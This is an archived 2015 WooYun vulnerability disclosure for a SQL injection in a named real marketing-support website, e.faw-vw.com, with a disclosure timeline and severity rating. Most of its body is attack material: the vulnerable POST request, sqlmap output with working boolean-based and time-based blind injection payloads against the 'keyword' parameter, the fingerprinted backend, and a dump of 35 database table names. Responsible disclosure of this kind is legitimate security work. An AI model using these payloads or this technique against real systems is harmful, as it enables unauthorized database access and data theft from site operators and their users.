乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-10: 细节已通知厂商并且等待厂商处理中 2015-10-14: 厂商已经确认,细节仅向厂商公开 2015-10-24: 细节向核心白帽子及相关领域专家公开 2015-11-03: 细节向普通白帽子公开 2015-11-13: 细节向实习白帽子公开 2015-11-28: 细节向公众公开
http://e.faw-vw.com/ 营销支持中心
POST /estudy/estudy_industry_news/get_estudy_news_bypaper?news_type_id=1&pageindex=1&pagesize=10 HTTP/1.1Content-Length: 142Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://e.faw-vw.comCookie: _ga=GA1.2.1641452249.1444402416; _gat=1Host: e.faw-vw.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*keyword=1
sqlmap resumed the following injection point(s) from stored session:---Parameter: keyword (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: keyword=1%' AND 3440=3440 AND '%'=' Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: keyword=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))dhee) AND '%'='---web application technology: Apache, PHP 5.3.9back-end DBMS: MySQL 5.0.12Database: auto_dmp_estudy[35 tables]+-----------------------------------------+| estudy_case_subject || estudy_document || estudy_document_collect || estudy_document_download || estudy_document_type || estudy_document_view || estudy_good_case || estudy_news || estudy_news_collect || estudy_news_type || estudy_paper || estudy_paper_answer_info || estudy_paper_preference || estudy_paper_pub_relation || estudy_paper_publication || estudy_paper_question_filling || estudy_paper_question_judge || estudy_paper_question_relation || estudy_paper_question_selection || estudy_paper_type || estudy_question_short || estudy_question_type || estudy_questionnaire || estudy_questionnaire_answer_info || estudy_questionnaire_answer_item || estudy_questionnaire_answer_items || estudy_questionnaire_preference || estudy_questionnaire_pub_relation || estudy_questionnaire_publication || estudy_questionnaire_question_filling || estudy_questionnaire_question_judge || estudy_questionnaire_question_relation || estudy_questionnaire_question_selection || estudy_questionnaire_short || estudy_questionnaire_type |+-----------------------------------------+
危害等级:中
漏洞Rank:10
确认时间:2015-10-14 11:00
感谢关注!
暂无